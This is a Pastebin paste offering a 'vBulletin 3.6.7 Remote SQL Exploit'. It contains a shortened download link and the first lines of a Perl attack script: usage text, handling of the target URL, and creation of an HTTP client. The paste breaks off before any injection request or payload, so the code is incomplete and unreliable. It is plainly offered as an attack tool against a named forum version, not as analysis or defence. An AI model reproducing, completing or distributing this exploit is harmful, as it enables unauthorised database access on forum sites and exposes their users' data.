akhilistroy

vBulletin 3.6.7 Remote SQL Exploit

Nov 29th, 2014
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. vBulletin 3.6.7 Remote SQL Exploit
  2.  
  3. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
  4. ------------------------------
  5. Download: http://adf.ly/ulI3a
  6. ------------------------------
  7. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
  8. #!/usr/bin/perl
  9.  
  10. use LWP::UserAgent;
  11.  
  12. use HTTP::Request;
  13.  
  14. system("clear");
  15.  
  16. print "------------------------------------------------\n";
  17.  
  18. print " vBulletin 3.6.7 Exploit \n";
  19.  
  20. print "------------------------------------------------\n";
  21.  
  22. $target = $ARGV[0];
  23.  
  24. $path = $ARGV[1];
  25.  
  26. if($target eq '')
  27.  
  28. {
  29.  
  30. print "[*] Usage: perl vb.pl <target> <path> \n";
  31.  
  32. exit(1);
  33.  
  34. }
  35.  
  36.  
  37.  
  38. if($target !~ /http:\/\//)
  39.  
  40. {
  41.  
  42. $target = "http://$target";
  43.  
  44. }
  45.  
  46. sleep 1;
  47.  
  48. print "[*] Exploiting . . \n";
  49.  
  50. $agent = LWP::UserAgent->new();
Add Comment
Please, Sign In to add comment